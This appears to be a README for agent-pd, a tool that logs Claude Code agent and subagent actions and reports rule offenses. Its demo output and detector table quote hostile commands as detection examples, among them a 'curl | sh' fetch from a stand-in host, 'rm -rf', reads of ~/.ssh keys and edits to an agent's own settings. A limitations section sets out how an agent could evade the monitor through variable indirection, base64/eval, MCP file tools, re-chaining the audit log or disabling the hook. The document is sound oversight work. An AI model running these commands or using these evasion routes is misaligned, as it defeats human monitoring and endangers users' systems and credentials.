# Show HN: A police department for your Claude Code agents

> Source: <https://github.com/varmabudharaju/agent-pd/blob/master/README.md>
> Published: 2026-06-11 17:47:39+00:00

A logging-only hook records every tool & permission event from the main agent **and** its
subagents; the `pd` CLI replays that log through six detectors and reports rule offenses with
quoted evidence. **Catch-and-report: it never blocks.**

**Quickstart** · [How it works](#how-it-works-mental-model) · [Detectors](#the-detectors) · [Architecture](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md) · [Security](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md)

The department's body-cam. agent-pd won't stop the heist, but every move your agents make ends up on the record.

**Flight recorder + police scanner, not a firewall.** If you need to *stop* an action, that stays with Claude Code's permission prompts or an OS sandbox. agent-pd tells you what an agent did: faithfully, after the fact or live as it happens.

**Highlights**

- **Covers the main agent + every subagent**, including those spawned by Claude Code's new dynamic **Workflow** tool (verified against recorded `workflow-subagent` hook events).
- **Six deterministic detectors** at **zero token cost**: denied calls, out-of-scope & credential access, permission bypass, self-permissioning, disallowed tools, off-task work.
- **Tamper-evident audit log** (hash-chained) with an optional **off-host append-only sink**.
- **Sessions are named, not UUIDs**: `pd list` and `pd watch` show each session's project directory and first user prompt, derived from data already in the logs (works retroactively).
- **Honest by design**: it raises the bar; it is **not** a sandbox. See [SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md).

**What it looks like**: `pd watch --all` across three concurrent sessions (three projects,
main agents + subagents with their briefs, two genuine flags and one borderline search among
the ordinary work).

Every screenshot in this README is a real Terminal capture of the real engine replaying a seeded three-session fleet; reproduce them yourself with `examples/demo-sessions.sh`.

Claude Code agents can read files, run shell commands, and spawn subagents. Most of that is
fine — but you usually find out what an agent *actually did* only by scrolling a transcript,
and **denied calls never reach the transcript at all** (Claude Code kills them first). agent-pd
installs a hook that records every event to a per-session audit log, then gives you tools to
ask: *did any agent go out of scope, touch credentials, try to escalate, edit its own config,
use a tool it wasn't allowed, or wander off its brief?*

```
 SETUP              CAPTURE (automatic, every session)        READ (per session or --all)
 pd install-hook  →  hook fires on every tool call        →   pd report   (forensic)
      │                    │                                   pd watch    (live scanner)
 settings.json       ~/.claude/pd/audit/<session>.jsonl        pd judge    (opt-in LLM pass)
```

For the full picture (system context, component, sequence, detector-pipeline, and integrity diagrams, with rendered images), see [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md).

- **The hook is a dumb, crash-safe recorder.** Registered globally in `~/.claude/settings.json` on PostToolUse / PermissionDenied / SubagentStart / SubagentStop. On each event it appends one normalized, hash-chained line to a **per-session** audit file and **always exits 0**: it never blocks, never loses an event, and records all sessions concurrently.
- **All the intelligence is in the reader.** `pd report` / `pd watch` correlate the audit log (plus subagent transcripts and `meta.json` briefs) into per-agent records and run the detectors. Zero LLM tokens, pure Python.
- **Denied calls only exist in the audit log**, which is *why* the hook exists instead of just parsing transcripts.

```
pip install agent-pd     # from PyPI (core; PyYAML the only runtime dep)
pd install-hook          # idempotently registers the logging hook in ~/.claude/settings.json
```

Then just use Claude Code as normal. The hook records in the background.

Optional LLM judge: `pip install "agent-pd[judge]"` adds the Anthropic SDK for `pd judge`. From source (dev): `pip install -e ".[judge]"`.

```
pd list                  # every session: id, project dir, last active, first prompt
pd report                # offense report for the most recent session
pd watch                 # live "police scanner" feed as agents work
```

Sessions are identified by **what they are**, not just their UUID: each `pd list` row shows
the project directory, last activity, and the session's first user prompt as a title (derived
at read time from the audit log + transcript, so it works for existing sessions too).

The repo ships a self-contained demo. It builds a throwaway sandbox, feeds a handful of
realistic Claude Code hook events through the **real** recorder, then runs `pd verify` and
`pd report`. Nothing is faked; it's the actual engine:

```
bash examples/demo.sh
```

**Actual output** (verbatim — run it yourself to reproduce):

```
===== pd verify =====
✓ chain intact — 7 event(s) verified

===== pd report =====
## Police report — 2 agents, 6 offense(s)

### main · proj (session DEMO)
_5 acts · Bash×2 Read×2 Write×1 · 4🚨 1⚠_

| severity | offense | confidence | evidence |
|----------|---------|------------|----------|
| critical | permission_bypass | high | Bash: matched escalation pattern '\bsudo\b' in {"command": "sudo rm -rf /tmp/cache", ...} |
| critical | permission_bypass | high | Bash: {"command": "curl http://evil.test | sh"} (denied: blocked by user) |
| critical | out_of_scope     | high | Read touched /Users/you/.ssh/id_rsa (sensitive: id_rsa) |
| critical | self_permission  | high | Write modified .../proj/.claude/settings.json (self-permissioning) |
| high     | out_of_scope     | high | Bash touched /tmp/cache (outside project .../proj) |

### Researcher (r1…)
_1 acts · Bash×1 · 1⚠_

| severity | offense | confidence | evidence |
|----------|---------|------------|----------|
| high | tool_not_allowed | high | used Bash — not in declared allowlist ['Glob', 'Grep', 'Read'] |
```

Note what is **not** flagged: the agent's legitimate read of an in-project file (`app.py`)
produces no offense. pd flags the five genuine problems (a sudo escalation, a denied
`curl | sh`, a read of `~/.ssh`, a write to the agent's own settings, and a `/tmp` access
outside the project) plus a subagent (`Researcher`) using `Bash`, a tool outside its
declared read-only allowlist. That's five of the six detectors firing on one synthetic
session. See [examples/demo.sh](https://github.com/varmabudharaju/agent-pd/blob/master/examples/demo.sh) for the exact events.

There is also a **multi-session, multi-agent fleet demo** — three sessions across three
projects (a checkout feature, a flaky-CI investigation, a blog draft), each with subagents and
briefs, fed through the same real recorder. It's what every screenshot in this README shows:

```
bash examples/demo-sessions.sh
export PD_AUDIT_DIR=/tmp/pd-demo-fleet/audit
pd list  --projects-dir /tmp/pd-demo-fleet/projects
pd watch --all --replay --projects-dir /tmp/pd-demo-fleet/projects
```

`pd report` on the fleet's flaky-CI session shows a per-agent digest, offense table, and quoted evidence.

Want to verify it on your own real Claude Code session? Follow the safe ~15-minute hands-on walkthrough in `docs/manual-tests/TRY-IT-LIVE.md`.

```
pd install-hook                       # register the logging hook (one-time)
pd list                               # every session: id · project · last active · “first prompt”

pd report                             # offense report, most recent session
pd report --session <id> --format md  # md | json | both
pd report --verbose                   # full evidence + files-touched per agent
pd report --agent <id|main>           # focus one agent: digest + every action it took

pd watch                              # live feed, most recent session — streams NEW activity
                                      #   from now (like tail -f); existing backlog is skipped
pd watch --replay                     # replay the whole session's backlog first, then tail
pd watch --all                        # merged feed across ALL sessions (§session tag; an intro
                                      #   line names each session's project + first prompt)
pd watch --crimes-only                # quiet unless something's wrong
pd watch --verbose                    # full commands + reasons, no truncation
pd watch --session <id> --no-color --no-emoji   # plain terminals / SSH

pd verify                             # check the audit-log hash-chain (most recent session)
pd verify --all                       # verify every session; exit 2 on tamper/truncation
                                      # set PD_AUDIT_KEY for HMAC-keyed integrity

pd judge                              # dry run (free): items / agents / ≈token estimate
pd judge --run --via-claude-code      # confirm off_task flags on your Claude subscription
pd judge --run --model sonnet --max 20    # or via the metered Anthropic API

pd compact [--session ID] [--prune-older-than DAYS] [--dry-run]
                                      # gzip old logs (<sid>.jsonl -> .jsonl.gz); skips the active
                                      # session; lossless for detection. Optional age-based prune.

pd sink push [--session ID] [--all]   # forward un-sent chained events off-host (append-only sink)
pd sink status [--session ID] [--all] # forwarded/last per session; flags "remote ahead"
```

Six deterministic detectors (zero tokens) plus one opt-in LLM pass.

| Offense | Severity | What it catches | Confidence |
|---|---|---|---|
| `permission_bypass` | critical | Denied calls + a two-tier Bash scan: never-downgrade catastrophic (`rm -rf /`, fork bomb, `curl\|sh`, `dd of=/dev/…`) stay critical under any allow-rule; downgradable escalation (sudo, `chmod 777`, cwd-wipe) only by a precise rule. | high |
| `out_of_scope` | high / critical | File or Bash path outside the project (auto: git root or cwd), or outside configured `scope_dirs`. Sensitive paths (`~/.ssh`, `~/.aws`, `~/.claude`, `/etc/shadow`, shell history…) are always critical and never downgraded. | high |
| `self_permission` | critical | Any agent write to its own control files (`.claude/settings*.json`, `.claude/agents/*.md`, `pd-rules*.yaml`) via any method (Write/Edit/NotebookEdit or Bash `cp`/`mv`/`tee`/`sed`/`python`/`base64`/redirect), regardless of content. | high |
| `tool_not_allowed` | high | A subagent uses a tool outside its declared `tools:` allowlist (`.claude/agents/<type>.md`). | high |
| `redundant` | low | Exact-duplicate tool calls (ignores Bash `description` noise). | high |
| `off_task` | review | Search/query terms vs. the agent's brief, by word-overlap below a threshold. | low (heuristic) |
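To make the simplest row concrete, here is a minimal sketch of exact-duplicate detection that ignores the Bash `description` field. It is an illustration only, not agent-pd's code: `call_key` and `find_redundant` are hypothetical names, and the input field names (`command`, `description`, `file_path`) are assumptions about how tool inputs are shaped.

```python
import json
from collections import Counter


def call_key(tool: str, tool_input: dict) -> tuple:
    """Build a comparison key; Bash descriptions are free text, so drop them."""
    if tool == "Bash":
        tool_input = {k: v for k, v in tool_input.items() if k != "description"}
    return tool, json.dumps(tool_input, sort_keys=True)


def find_redundant(calls: list) -> list:
    """Return the keys of tool calls that occur more than once."""
    counts = Counter(call_key(tool, tool_input) for tool, tool_input in calls)
    return [key for key, n in counts.items() if n > 1]
```

Two `ls` calls with different descriptions collapse to the same key, so the pair is reported once as redundant.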

The five high-confidence detectors are trustworthy and free. `off_task` is intentionally noisy
and hard-labeled low-confidence; the **judge** (below) turns it into high-confidence verdicts.
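A word-overlap heuristic of the kind `off_task` describes might look like the sketch below. The tokenizer, the stopword list, the function names, and the `0.2` threshold are all assumptions made for illustration; the real threshold is whatever `off_task_overlap_threshold` resolves to.

```python
import re

# Assumed, deliberately tiny stopword list for the sketch.
STOPWORDS = {"the", "a", "an", "of", "to", "in", "for", "and", "on", "is"}


def tokens(text: str) -> set:
    """Lowercase alphanumeric words, minus stopwords."""
    return {w for w in re.findall(r"[a-z0-9]+", text.lower()) if w not in STOPWORDS}


def overlap(brief: str, query: str) -> float:
    """Fraction of the query's terms that also appear in the brief."""
    q = tokens(query)
    if not q:
        return 1.0  # nothing to compare, so nothing to flag
    return len(q & tokens(brief)) / len(q)


def is_off_task(brief: str, query: str, threshold: float = 0.2) -> bool:
    """Flag for review when overlap falls below the (assumed) threshold."""
    return overlap(brief, query) < threshold
```

A search that shares no words with the brief scores 0.0 and is flagged, which also shows why the result is only "review": a legitimate search phrased in different vocabulary scores just as low.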

`out_of_scope` and escalation hits are **downgraded to a quiet info severity** when the action
matches a permission **allow-rule** you configured (`permissions.allow` in
`~/.claude/settings.json` or project `.claude/settings.local.json`): *authorized → info,
unauthorized → full severity*.

Matching is **faithful to Claude Code's own semantics**: shell-operator splitting (a
`Bash(git:*)` rule does **not** license `git status && rm -rf ~`), command-substitution /
backtick extraction, redirect targets as a separate authorization, word-boundary prefixes
(`npm install:*` ≠ `npm installmalware`), and gitignore-style globs. Ambiguity resolves
**conservatively → not permitted** (under-flagging is worse than over-flagging). Two things
are **never** downgraded: sensitive-path access and categorically-catastrophic commands. A
denied call stays critical regardless, since a denial is unpermitted by definition.
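Two of those rules, operator splitting and word-boundary prefixes, can be sketched as follows. This is a simplified illustration rather than agent-pd's matcher: the function names are hypothetical, it takes bare prefixes such as `git` instead of parsing `Bash(git:*)` rules, it ignores quoting, and where the real matcher extracts substitutions and redirect targets this sketch simply treats them as ambiguous and refuses.

```python
import re

# Split on &&, ||, ;, |, & and newlines (quoting is ignored in this sketch).
_OPERATORS = re.compile(r"\s*(?:&&|\|\||[;|&\n])\s*")
# Constructs this sketch does not analyze; their presence means "not permitted".
_AMBIGUOUS = ("$(", "`", ">", "<")


def split_commands(command: str) -> list:
    """Break a compound shell line into its individual commands."""
    return [part for part in _OPERATORS.split(command.strip()) if part]


def prefix_allows(rule_prefix: str, command: str) -> bool:
    """Match on a word boundary: 'npm install' does not cover 'npm installmalware'."""
    return command == rule_prefix or command.startswith(rule_prefix + " ")


def is_authorized(command: str, allowed_prefixes: list) -> bool:
    """Every sub-command must match a rule; anything unclear is not permitted."""
    if any(marker in command for marker in _AMBIGUOUS):
        return False
    parts = split_commands(command)
    if not parts:
        return False
    return all(any(prefix_allows(p, part) for p in allowed_prefixes) for part in parts)
```

With `["git"]` as the allowlist, `git status` is authorized but `git status && rm -rf ~` is not, because the second sub-command matches no rule.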

An optional LLM pass that reads each agent's brief and its flagged searches, then confirms or
drops the noisy `off_task` flags. Built to cost almost nothing:

- **Opt-in**: never runs in the hook or `pd watch`.
- **Dry-run by default**: prints an estimate; add `--run` to actually call.
- **Pre-filtered + batched**: only already-flagged items, one API call per agent.
- **Two backends:** `--via-claude-code` shells out to the headless `claude` CLI (**your Claude subscription, no API key**), or the metered Anthropic API (`pip install -e ".[judge]"` + `ANTHROPIC_API_KEY`).
- `--model haiku|sonnet|opus` (default haiku), `--max N`.

In the demo fleet, the orders-api subagent rabbit-holed into a CI-infra search with zero word-overlap against its brief — the heuristic flags it for review, and the dry run prices out exactly what confirming it would cost:

A real-time feed of what your agents are doing and which rules they're breaking. The header
**names the session it attached to** — project directory plus the session's first prompt — so
attaching to the default (most recent) session is never a mystery:

Each agent gets a stable color and a banner with its assigned brief; every action is a feed
line with a severity badge; a live rap-sheet footer tallies crimes per agent. With `--all`
(merged feed across every session) the first time a session appears it prints a
`§sid · project · “title”` intro line, so interleaved sessions stay tellable-apart (see the
fleet screenshot at the top of this README).

`--crimes-only` keeps the feed quiet unless something is actually wrong (only flagged actions
stream), and Ctrl-C prints a final **rap sheet** tallying every agent in every session.

Zero extra dependencies — ANSI only. The full annotated
screenshot set lives in [docs/test-evidence.md](https://github.com/varmabudharaju/agent-pd/blob/master/docs/test-evidence.md).

Every event carries a `seq` and a `chain = sha256(prev_chain + canonical(event))` (HMAC-SHA256
if `PD_AUDIT_KEY` is set), computed by the hook under a per-session file lock with a
`<sid>.head.json` anchor. **`pd verify`** recomputes the chain and reports `✓ intact`,
`✗ TAMPER DETECTED`, or `✗ TRUNCATED` (exit 2), and holds across `pd compact`. Here it is
catching both attacks for real: one event deleted from a log's tail, then one byte flipped
inside a recorded command (the compacted session still verifies).

This is tamper-**evident**, not tamper-**proof**: a same-user agent with Bash can re-chain the
whole file. To close the *retroactive-deletion* half of that gap, **`pd sink push`** forwards each
chained event to an **off-host, append-only destination** (file or http backend; env-only
`PD_SINK_TOKEN`; `https://` enforced for remote tokens; redirects not followed). Once an event has
shipped off-host, a later local rewrite can't reach it. **`pd sink status` flags "remote ahead" when more events shipped than remain locally, which is a truncation signal.**

Append-only is a *deployment requirement* pd can't enforce, and the sink does not stop a same-user agent from *forging* entries or *disabling* the hook. Read [SECURITY.md](https://github.com/varmabudharaju/agent-pd/blob/master/SECURITY.md) for the full, honest framing before relying on any of this.
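The chain formula above can be sketched in a few lines. This is a minimal illustration under stated assumptions, not agent-pd's implementation: the all-zero `GENESIS` value, the canonical form (sorted-key compact JSON), the in-memory list standing in for the `.jsonl` file, and the `expected_count` argument standing in for the `<sid>.head.json` anchor are all choices made for the example.

```python
import hashlib
import hmac
import json
from typing import Optional

GENESIS = "0" * 64  # assumed prev_chain value for the first event


def canonical(event: dict) -> bytes:
    """Deterministic serialization: sorted keys, no insignificant whitespace."""
    return json.dumps(event, sort_keys=True, separators=(",", ":")).encode("utf-8")


def link(prev_chain: str, event: dict, key: Optional[bytes] = None) -> str:
    """sha256(prev_chain + canonical(event)), or HMAC-SHA256 when a key is given."""
    data = prev_chain.encode("ascii") + canonical(event)
    if key:
        return hmac.new(key, data, hashlib.sha256).hexdigest()
    return hashlib.sha256(data).hexdigest()


def append(log: list, event: dict, key: Optional[bytes] = None) -> None:
    """Add seq and chain to an event and append it to the log."""
    prev = log[-1]["chain"] if log else GENESIS
    body = dict(event, seq=len(log) + 1)
    log.append(dict(body, chain=link(prev, body, key)))


def verify(log: list, expected_count: int, key: Optional[bytes] = None) -> str:
    """Recompute every link; report 'tamper', 'truncated', or 'intact'."""
    prev = GENESIS
    for i, record in enumerate(log, start=1):
        body = {k: v for k, v in record.items() if k != "chain"}
        expected = link(prev, body, key)
        if body.get("seq") != i or not hmac.compare_digest(str(record.get("chain")), expected):
            return "tamper"
        prev = record["chain"]
    return "truncated" if len(log) < expected_count else "intact"
```

Dropping the last record leaves every remaining link valid, which is why truncation needs a separate anchor to detect; and because anyone who can run `append` can rebuild the whole list, the sketch shares the same-user re-chaining limit described above unless a key is held elsewhere.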

agent-pd **raises the bar; it is not a sandbox.** A determined same-privilege adversary using
obfuscation or indirection can evade static detection. Known limits, in plain terms:

- **Obfuscation / indirection evades static detection.** Multi-level `$VAR` chains (`A=/etc/shadow; B=$A; cat $B`; only single-level expansion is followed), `$IFS` / word-split tricks, two-step download-then-exec (`curl -o f url; sh f`), base64/eval-assembled commands, and dynamically-built paths can slip past.
- **Non-Bash file-write MCP tools bypass `self_permission`.** Only Write/Edit/NotebookEdit and Bash are inspected for control-file writes; a filesystem MCP tool with a different shape could write `.claude/settings.json` undetected.
- **`off_task` is heuristic** (word-overlap) and can't run on the main agent or on Workflow subagents (no brief). `pd judge` is the trustworthy path.
- **`~/.config` sensitivity is broad** and can be noisy (it holds innocuous app config too).
- **Tool *results* aren't surfaced**: the hook captures `tool_input` and an outcome flag, not full `tool_response`, to keep the audit log from bloating. The feed shows what an agent *did*, not its output.
- **Audit integrity is tamper-evident, not tamper-proof** (above), and the off-host sink's append-only guarantee is the operator's responsibility.
- **Symlink resolution is best-effort** (the symlink must exist at analysis time).
- **Sessions that predate the hook** (transcript-only, no `<sid>.jsonl`) don't appear in `pd report`.

The full ledger of shipped / residual / declined items lives in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).

Prioritized, none blocking — scoped so any one can be picked up independently:

- **Tool-agnostic control-file detection**: flag *any* tool whose input names a control path in a write-shaped field (closes the MCP `self_permission` gap).
- **Multi-level `$VAR` resolution**: iterate variable substitution to a fixed point so 2-hop indirection (`B=$A`) no longer hides a sensitive path.
- **Truncate / cap `tool_result`** at capture to keep raw `.jsonl` small.
- **Narrow `~/.config` sensitivity** to credential-bearing subpaths (`gh`, `gcloud`, …) to cut noise.
- **Sink enhancements**: chunk large backlogs, a syslog backend, and `pd verify --against-sink` read-back reconciliation.
- **`pd summary <session>`**: per-agent digest (files touched, time span, tool histogram).
- **Judge verdict disk cache**: skip re-judging identical (brief, search) pairs.
- **Capture more hook events** (`PostToolUseFailure`, `PreCompact`, `SessionEnd`) to enrich timelines.
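As an illustration of the fixed-point idea in the `$VAR` roadmap item, the sketch below keeps substituting until the text stops changing. It is not agent-pd code and the feature is not shipped: the function names are hypothetical, only `;`-separated `NAME=value` assignments are recognized, and shell evaluation order and quoting are ignored.

```python
import re

_ASSIGN = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(\S*)$")
_VAR = re.compile(r"\$(?:\{([A-Za-z_][A-Za-z0-9_]*)\}|([A-Za-z_][A-Za-z0-9_]*))")


def expand_once(text: str, env: dict) -> str:
    """Replace each $NAME or ${NAME} with its value; unknown names are left alone."""
    def substitute(match):
        name = match.group(1) or match.group(2)
        return env.get(name, match.group(0))
    return _VAR.sub(substitute, text)


def resolve(command: str, max_rounds: int = 10) -> list:
    """Collect assignments, then expand the remaining commands to a fixed point."""
    env, rest = {}, []
    for part in (p.strip() for p in command.split(";")):
        found = _ASSIGN.match(part)
        if found:
            env[found.group(1)] = found.group(2)
        elif part:
            rest.append(part)
    resolved = []
    for part in rest:
        for _ in range(max_rounds):  # the bound guards against cycles like A=$B; B=$A
            expanded = expand_once(part, env)
            if expanded == part:
                break
            part = expanded
        resolved.append(part)
    return resolved
```

On the example from the limitations list, `A=/etc/shadow; B=$A; cat $B` resolves to `cat /etc/shadow` after two rounds, so a sensitive-path check run on the resolved text would see the real target.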

agent-pd works out of the box with no config: every rule (sensitive paths, escalation
patterns, severities, the `off_task` threshold) ships as a built-in default. A `pd-rules.yaml`
file is **optional**, and only needed to override those defaults.

When you do write one, every command **auto-discovers** it, no flag required. On each run `pd`
looks for `pd-rules.yaml` in this order and uses the first it finds, deep-merged over the
built-in defaults:

- the current directory
- the enclosing **project root** (the git root above the cwd)
- `~/.claude/pd-rules.yaml` (a global default for all projects)
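The lookup order above can be sketched as a first-match search. This is an illustration, not agent-pd's code: `find_git_root` and `discover_rules` are hypothetical names, and detecting the project root by walking up to a `.git` entry is an assumption about how "git root" is determined.

```python
from pathlib import Path
from typing import Optional


def find_git_root(start: Path) -> Optional[Path]:
    """Walk upward from start until a directory containing .git is found."""
    for candidate in (start, *start.parents):
        if (candidate / ".git").exists():
            return candidate
    return None


def discover_rules(cwd: Path, home: Path) -> Optional[Path]:
    """Return the first pd-rules.yaml found: cwd, then project root, then global."""
    candidates = [cwd / "pd-rules.yaml"]
    root = find_git_root(cwd)
    if root is not None:
        candidates.append(root / "pd-rules.yaml")
    candidates.append(home / ".claude" / "pd-rules.yaml")
    for path in candidates:
        if path.is_file():
            return path
    return None  # no file: the built-in defaults apply unchanged
```

Passing `cwd` and `home` explicitly instead of reading them from the process keeps the function easy to exercise against a temporary directory tree.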

Precedence is **`--rules <path>` › auto-discovered file › built-in defaults**: pass `--rules`
on any command (including `pd watch`) to point at a specific file and override discovery. See
`pd-rules.yaml` in this repo for every supported key (`scope_dirs`, sensitive paths, the two
escalation tiers, severities, `off_task_overlap_threshold`, `storage`, and a `sink` section).

Lists in `pd-rules.yaml` *replace* the corresponding default list (deep-merge replaces lists, not appends), so if you set `sensitive_patterns`, include the built-ins you still want.
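The list-replacement behavior is easy to get wrong, so here is a minimal sketch of a deep merge with those semantics. The function name `deep_merge` and the shape of the example dictionaries are assumptions for illustration; only the `sensitive_patterns` key and the "lists replace, dicts merge" rule come from the text above.

```python
from copy import deepcopy


def deep_merge(defaults: dict, overrides: dict) -> dict:
    """Merge nested dicts key by key; scalars and lists are replaced wholesale."""
    merged = deepcopy(defaults)
    for key, value in overrides.items():
        if isinstance(value, dict) and isinstance(merged.get(key), dict):
            merged[key] = deep_merge(merged[key], value)
        else:
            merged[key] = deepcopy(value)  # a list override drops the default list
    return merged


# Illustrative values only; the real defaults live in the tool.
defaults = {"sensitive_patterns": ["~/.ssh", "~/.aws"], "severities": {"redundant": "low"}}
overrides = {"sensitive_patterns": ["~/secrets"]}
merged = deep_merge(defaults, overrides)
```

Here `merged["sensitive_patterns"]` contains only `~/secrets`: the two default entries are gone, which is exactly the case the note above warns about.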

The off-host sink also reads env overrides: `PD_SINK_TYPE=file|http`, `PD_SINK_PATH` /
`PD_SINK_URL`, `PD_SINK_TIMEOUT`, and the **env-only** `PD_SINK_TOKEN` (ignored if placed in a
config file, so it never lands in a checked-in or world-readable file).

```
~/.claude/pd/audit/<sid>.jsonl      # live capture (hook appends here)
~/.claude/pd/audit/<sid>.jsonl.gz   # compacted (pd compact, gzip)
```

The audit log stores **full tool inputs** (file contents and Bash commands), which **may include
secrets in plaintext**. It lives **outside your repo** (won't be committed by accident) but treat
it like any sensitive local file. `pd compact` gzips, it does **not** encrypt. Nothing is uploaded
unless you configure a sink. To clear it: `rm ~/.claude/pd/audit/*.jsonl` (it repopulates as
sessions run).
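If you want to inspect these files yourself, both the live and the compacted form can be read the same way, since gzip only wraps the same JSON lines. The sketch below assumes nothing about the event schema beyond "one JSON object per line"; `read_events` is a hypothetical helper, not part of the `pd` CLI.

```python
import gzip
import json
from pathlib import Path
from typing import Iterator


def read_events(path: Path) -> Iterator[dict]:
    """Yield one dict per non-empty line from a .jsonl or .jsonl.gz file."""
    opener = gzip.open if path.suffix == ".gz" else open
    with opener(path, "rt", encoding="utf-8") as fh:
        for line in fh:
            if line.strip():
                yield json.loads(line)
```

Because the output can contain plaintext secrets, treat anything you print or pipe from it with the same care as the log itself.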

**Choosing where logs go.** The default is deliberately a hidden, local, non-repo path. To put
logs somewhere you choose, set `PD_AUDIT_DIR`, or bake it into the hook at install time:

```
pd install-hook --audit-dir ~/agent-pd-logs   # hook + CLI both use this path
# or, per shell: export PD_AUDIT_DIR=~/agent-pd-logs
```

Both the hook (writes) and every `pd` command (reads) honor `PD_AUDIT_DIR` (precedence:
`--audit-dir` flag › `PD_AUDIT_DIR` › default). A **relative** path is resolved to an absolute
one when it's set (the install flag bakes the absolute path; `PD_AUDIT_DIR` is absolutized when
read), so logs always land in one fixed place instead of scattering into whatever directory each
agent happens to run in. Still, **don't** point it at a repo folder or a cloud-synced directory
(iCloud/Dropbox) unless you accept that plaintext tool inputs, possibly secrets, will be
committed or synced off-machine.
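That precedence and the absolutizing step can be sketched as one small function. This is an illustration of the described behavior, not agent-pd's code: `resolve_audit_dir` is a hypothetical name, and the `env` parameter exists only so the example can be exercised without touching the real environment.

```python
import os
from pathlib import Path
from typing import Mapping, Optional

DEFAULT_AUDIT_DIR = "~/.claude/pd/audit"


def resolve_audit_dir(flag: Optional[str] = None,
                      env: Optional[Mapping[str, str]] = None) -> Path:
    """Pick flag, then PD_AUDIT_DIR, then the default; always return an absolute path."""
    env = os.environ if env is None else env
    raw = flag or env.get("PD_AUDIT_DIR") or DEFAULT_AUDIT_DIR
    # abspath pins a relative value to the directory it was resolved in.
    return Path(os.path.abspath(Path(raw).expanduser()))
```

Resolving once and storing the absolute result is what keeps a value like `logs` from meaning a different directory in every project an agent runs in.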

```
pip install --user -e .          # core
pip install --user -e ".[judge]" # + anthropic SDK (only for the API judge backend)
python3 -m pytest -q             # 474 tests, pure (no API key needed)
```

TDD throughout; detectors, render, live, and judge are all unit-tested with no network. For the
design in depth: [SYSTEM-DESIGN.md](https://github.com/varmabudharaju/agent-pd/blob/master/SYSTEM-DESIGN.md) (formal design doc — goals, components,
permission model, trade-offs) and [ARCHITECTURE.md](https://github.com/varmabudharaju/agent-pd/blob/master/ARCHITECTURE.md) (diagrams). Honest
limitations and roadmap live in [KNOWN-GAPS.md](https://github.com/varmabudharaju/agent-pd/blob/master/KNOWN-GAPS.md).

[Apache License 2.0](https://github.com/varmabudharaju/agent-pd/blob/master/LICENSE) © Sai Ram Varma Budharaju. Free to use, modify, and distribute (including
commercially); retain the copyright and license notice. Includes a patent grant.
